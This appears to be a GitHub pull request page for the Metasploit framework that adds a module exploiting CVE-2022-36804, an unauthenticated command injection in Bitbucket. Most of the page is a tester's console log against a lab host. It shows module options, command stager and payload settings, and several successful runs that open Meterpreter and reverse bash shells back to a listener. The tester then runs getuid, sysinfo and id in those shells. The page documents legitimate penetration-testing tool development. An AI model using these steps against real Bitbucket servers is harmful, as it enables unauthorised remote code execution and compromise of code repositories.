-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add exploit for CVE-2022-36804 #17042
Conversation
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Worked great for me!
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
With the latest round of changes, everything I've tested is working great now including different command stager flavors and a few command payloads.
Testing Output
Bunch of payloads working correctly while targeting 7.21.3
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > show options
Module options (exploit/linux/http/bitbucket_git_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.27 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 7990 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base URI of Bitbucket application
URIPATH no The URI to use for this exploit (default is random)
USERNAME no The username to authenticate with
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Dropper
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER::FLAVOR curl
CMDSTAGER::FLAVOR => curl
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Using URL: http://192.168.159.128:8080/oD3783Hs
[*] Client 192.168.159.27 (curl/7.81.0) requested /oD3783Hs
[*] Sending payload to 192.168.159.27 (curl/7.81.0)
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Meterpreter session 7 opened (192.168.159.128:4444 -> 192.168.159.27:38282) at 2022-09-21 13:02:50 -0400
[*] Sending stage (3020772 bytes) to 192.168.159.10
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.159.27 - Meterpreter session 7 closed. Reason: Died
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set CMDSTAGER
[-] Meterpreter session 8 is not valid and will be closed
:[-] Meterpreter session 9 is not valid and will be closed
[*] 192.168.159.27 - Meterpreter session 8 closed.
[*] 192.168.159.27 - Meterpreter session 9 closed.
:FLAVOR bourne
CMDSTAGER::FLAVOR => bourne
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set LPORT 5555
LPORT => 5555
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (3020772 bytes) to 192.168.159.27
[*] Meterpreter session 10 opened (192.168.159.128:5555 -> 192.168.159.27:47800) at 2022-09-21 13:03:30 -0400
[*] Command Stager progress - 100.00% done (823/823 bytes)
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : 192.168.159.27
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 10...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set TARGET Unix\ Command
TARGET => Unix Command
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Sending stage (40168 bytes) to 192.168.159.27
[*] Meterpreter session 11 opened (192.168.159.128:5555 -> 192.168.159.27:41064) at 2022-09-21 13:04:08 -0400
meterpreter > getuid
Server username: atlbitbucket
meterpreter > sysinfo
Computer : ubuntu2004
OS : Linux 5.15.0-48-generic #54-Ubuntu SMP Fri Aug 26 13:26:29 UTC 2022
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter > background
[*] Backgrounding session 11...
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set PAYLOAD cmd/unix/reverse_bash
PAYLOAD => cmd/unix/reverse_bash
msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.159.128:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Searching Bitbucket for publicly accessible repository
[+] Found public repo 'pwnme' in project 'PWNME'!
[*] Command shell session 12 opened (192.168.159.128:5555 -> 192.168.159.27:54452) at 2022-09-21 13:04:51 -0400
id
uid=1001(atlbitbucket) gid=1001(atlbitbucket) groups=1001(atlbitbucket)
^Z
Background session 12? [y/N] y
msf6 exploit(linux/http/bitbucket_git_cmd_injection) >
Release NotesAdds an exploit for CVE-2022-36804 which is an unauthenticated RCE in Bitbucket. |
Nicely done. :) |
Description
Various versions of Bitbucket Server and Data Center are vulnerable to an unauthenticated command injection in multiple API endpoints. Successful exploitation requires access to a public repository. Supplying NULL bytes to the git command used at vulnerable endpoints allows the passage of extra arguments to the command, enabling command injection.
Verification
atlbitbucket
userScenarios